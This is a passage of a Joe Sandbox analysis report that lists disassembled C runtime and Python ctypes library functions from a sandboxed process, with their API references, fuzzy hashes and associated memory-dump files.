Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7196098b30ecd42809471233c9619b7315c9fb41ce716e28bdee8d0b35162eb6
Instruction ID: e8de3b58843ac5999db32ea75bdb50c2267dd31c86084eb2f236635d73a82786
Opcode Fuzzy Hash: 7196098b30ecd42809471233c9619b7315c9fb41ce716e28bdee8d0b35162eb6
Instruction Fuzzy Hash: C311C16261CA8281DA10AF26E804169A379AB85BF4F984331EE7D0BBD9DF3CD0548750

Function 00007FF75996B4DC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996B504

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3cb10c43647639a768565940e1ce5c449de1869fbc1a92892aa118bde093882e
Instruction ID: 0b736469cc200fad9cc83790cb14e96d26c54d52c02c6c295d590a6d1686b49b
Opcode Fuzzy Hash: 3cb10c43647639a768565940e1ce5c449de1869fbc1a92892aa118bde093882e
Instruction Fuzzy Hash: 2641B43290C28187EA24EF19E5402BDF7B4EB96B94F981131D78E876D5EF2CE402C761

Function 00007FF759956360 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF75995640A

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 371dc62f6a8d9f982387afa1ff5e907b60a7ec077156d3d6faccab25bfbe9410
Instruction ID: a232cfc140b280c8510719af32b4a1875bfc8e574529bb028c6ca10717ca6435
Opcode Fuzzy Hash: 371dc62f6a8d9f982387afa1ff5e907b60a7ec077156d3d6faccab25bfbe9410
Instruction Fuzzy Hash: 41215E21B086D266EA14BF52A9043BBEA61BF89BD4FCC5430EE0D07786CF7DE4458614

Function 00007FF75996AF6C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996AFF2

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ff4bd6b019ced27284b6fa2760217448de45b7808968d4935831090a049e7df0
Instruction ID: fb401fb57efb72a37fb132568b7045aba853e9c549946c266819940720ebb746
Opcode Fuzzy Hash: ff4bd6b019ced27284b6fa2760217448de45b7808968d4935831090a049e7df0
Instruction Fuzzy Hash: 5B31A162A196C281E711BF5AC84037CAA70AFC0B94FD90139EA1D437D2DF7DE8418772

Function 00007FF759968919 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF759968947

Part of subcall function 00007FF759968A40: GetModuleHandleExW.KERNEL32 ref: 00007FF759968A65
Part of subcall function 00007FF759968A40: GetProcAddress.KERNEL32 ref: 00007FF759968A7B
Part of subcall function 00007FF759968A40: FreeLibrary.KERNEL32 ref: 00007FF759968AA2

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 7474e071a48ef7130f5acd4d7b35ddfbaeb0d66e7037ac086cf5d56d8c80b409
Instruction ID: b43c1a5454fb0e5ae53c914eed97756fe2728c914b9fa2e00d006c3e564dd977
Opcode Fuzzy Hash: 7474e071a48ef7130f5acd4d7b35ddfbaeb0d66e7037ac086cf5d56d8c80b409
Instruction Fuzzy Hash: 4721AE72A047828AEB24AF65C4402FC73B0EB8531DF881A36D76D06AC5DF7CD485CBA1

Function 00007FF759965538 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996549D

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 25f020cec256df429067bb606d051891f0f83e0bb8faa834007163ccabd97c9c
Instruction ID: 0ba916d216a2e2ee853e3152d67453413698e37af0b3663d8f2c70c608de945b
Opcode Fuzzy Hash: 25f020cec256df429067bb606d051891f0f83e0bb8faa834007163ccabd97c9c
Instruction Fuzzy Hash: 4E118122A1D6C181EB60BF52D50027DE270BFC9B80FDC4475EA8C57A8ACF7DD8018761

Function 00007FF7599757DC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7599757FF

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e860bb9bc84c29a06dccfc010b7eb52daf61d2c250f48aeb7393b4a8ace16f10
Instruction ID: f613bd151718bc589ec232705eab40597d4358b4816272117225c49d3098ad1b
Opcode Fuzzy Hash: e860bb9bc84c29a06dccfc010b7eb52daf61d2c250f48aeb7393b4a8ace16f10
Instruction Fuzzy Hash: AF21C632A18A8287EBA1AF18D4403B9B6B0FBC5B54F9C4234E75D876D9DF3CD8018B51

Function 00007FF75995E97C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E9D0

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 298f7b2a666c55937c0a4044f00fb88544ba948c427ceaa5fd6043e577695ec0
Instruction ID: 339c320daa26776ef5ae310a71d9e68f57eb667f870d1cefe233299ec8106c52
Opcode Fuzzy Hash: 298f7b2a666c55937c0a4044f00fb88544ba948c427ceaa5fd6043e577695ec0
Instruction Fuzzy Hash: 1401A161A0879151EA54FF92990016EE7A5AFC6FE0F8C4639EEAC17BDACF3DD4118310

Function 00007FF75996DEB8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF75996AA16,?,?,?,00007FF759969BD3,?,?,00000000,00007FF759969E6E), ref: 00007FF75996DF0D

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69550027ed8e3bf035e7bef6798a6f7658c1153be72ca181ca789a5114add420
Instruction ID: 730741dcb377e6093eaa951a5438e93d23d1781eab007d3a339ba8b96ccb2296
Opcode Fuzzy Hash: 69550027ed8e3bf035e7bef6798a6f7658c1153be72ca181ca789a5114add420
Instruction Fuzzy Hash: 56F06D60F1A29340FE597F66DD502B8D2B45FE5B40FCC4434C91E862D2DF2CE4868230

Function 00007FF75996CC2C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF75995F1E4,?,?,?,00007FF7599606F6,?,?,?,?,?,00007FF75996275D), ref: 00007FF75996CC6A

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b827a7ab023d1767f95784f6f7fefaf86c66ee15463514ccfd07e797832e7771
Instruction ID: e4ad492af0a936d4f440466a2c38f7ff54cc9ef012ce539e7ff797dd588fcd48
Opcode Fuzzy Hash: b827a7ab023d1767f95784f6f7fefaf86c66ee15463514ccfd07e797832e7771
Instruction Fuzzy Hash: FEF05E50B192C640FE157F72994027991B48FC57A0FCC4A34EA2E452D1EF2EE44092B0

Function 00007FF759956310 Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF759956DB0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00007FF759956DEA

LoadLibraryW.KERNELBASE(?,?,00000000,00007FF7599522DE,?,?,?,?), ref: 00007FF759956333

Memory Dump Source

Source File: 00000007.00000002.2084219724.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000007.00000002.2084199609.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084249765.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF759990000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084289155.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.2084413235.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 4f2292e1e78b6b04c2ade65416a023b90951e6264d27b8cd69ba397aaf3470f3
Instruction ID: fdd8ef6695e122996233f56625cfa12e87bb29eb91dc4b5d157b1d47f5b11dd6
Opcode Fuzzy Hash: 4f2292e1e78b6b04c2ade65416a023b90951e6264d27b8cd69ba397aaf3470f3
Instruction Fuzzy Hash: 7DE08611B1958142DA18AB67E90546AE261EFC9BC0B8C9035DE0D47755DF2CD4914B04

Non-executed Functions

Function 00007FF8B9061B00 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B9061B1C
memset.VCRUNTIME140 ref: 00007FF8B9061B40
RtlCaptureContext.KERNEL32 ref: 00007FF8B9061B49
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B9061B63
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B9061BA4
memset.VCRUNTIME140 ref: 00007FF8B9061BD7
IsDebuggerPresent.KERNEL32 ref: 00007FF8B9061BF8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B9061C19
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B9061C24

Memory Dump Source

Source File: 00000007.00000002.2087887642.00007FF8B9061000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8B9060000, based on PE: true

Associated: 00000007.00000002.2087851325.00007FF8B9060000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087988693.00007FF8B9065000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2088065900.00007FF8B9066000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9060000_lib.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 491c6c3a996b181e7d4f6ff731a66c8976c72585f48119a1a83f76a26148e78e
Instruction ID: e3c7f479d2ee59657f484c24d81d5512c9c28a4f189aea44ec63ac2a5c455639
Opcode Fuzzy Hash: 491c6c3a996b181e7d4f6ff731a66c8976c72585f48119a1a83f76a26148e78e
Instruction Fuzzy Hash: A5313E72609AC28AEB60DF68E8903ED7360FB84784F444439DB4D47A98DF38D649C710

Function 00007FF8B93C6254 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B93C6270
memset.VCRUNTIME140 ref: 00007FF8B93C6294
RtlCaptureContext.KERNEL32 ref: 00007FF8B93C629D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B93C62B7
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B93C62F8
memset.VCRUNTIME140 ref: 00007FF8B93C632B
IsDebuggerPresent.KERNEL32 ref: 00007FF8B93C634C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B93C636D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B93C6378

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: ea38b9b02c827df44fb5011cb61d735aee822b3a281d6ad786fd76dbeb1e9228
Instruction ID: d16495dfe05cde151b2e865321553bb3bc953bb0bbdc5816b64a47415e90d419
Opcode Fuzzy Hash: ea38b9b02c827df44fb5011cb61d735aee822b3a281d6ad786fd76dbeb1e9228
Instruction Fuzzy Hash: 71314972609B8296EB608F68E8503EE3374FB88788F44503ADB4E47A98DF3CD548C700

Function 00007FF8B93C5304 Relevance: 124.6, APIs: 52, Strings: 19, Instructions: 370COMMON

Download Yara Rule

APIs

PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C532F
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5366
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C538B
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C53AA
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C53CC
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C53EB
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C540D
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C542C
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5451
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5470
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5495
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C54B4
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C54D9
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C54F8
PyUnicode_FromString.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C551F
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C553E
PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5565
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5584
PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C55AB
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C55CA
PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C55F1
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5610
PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5637
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5656
PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C567D
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C569C
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C56BE
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C56DD
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C56FF
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C571E
PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5743
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C575E
PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5795
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C921F
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C922E
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C923D
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C924C
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C925B
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C926A
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C9279
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C9288
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C9297
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C92A6
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C92B5
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C92C4
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C92D3
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C92E2
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C92F1
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C9300
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C9318
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C9327
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C9336

Strings

_memset_addr, xrefs: 00007FF8B93C55C0
FUNCFLAG_USE_ERRNO, xrefs: 00007FF8B93C5466
COMError, xrefs: 00007FF8B93C5356
FUNCFLAG_STDCALL, xrefs: 00007FF8B93C53E1
FUNCFLAG_CDECL, xrefs: 00007FF8B93C5422
FUNCFLAG_HRESULT, xrefs: 00007FF8B93C53A0
FUNCFLAG_PYTHONAPI, xrefs: 00007FF8B93C54EE
_string_at_addr, xrefs: 00007FF8B93C5606
1.1.0, xrefs: 00007FF8B93C5518
_cast_addr, xrefs: 00007FF8B93C564C
CTYPES_MAX_ARGCOUNT, xrefs: 00007FF8B93C5754
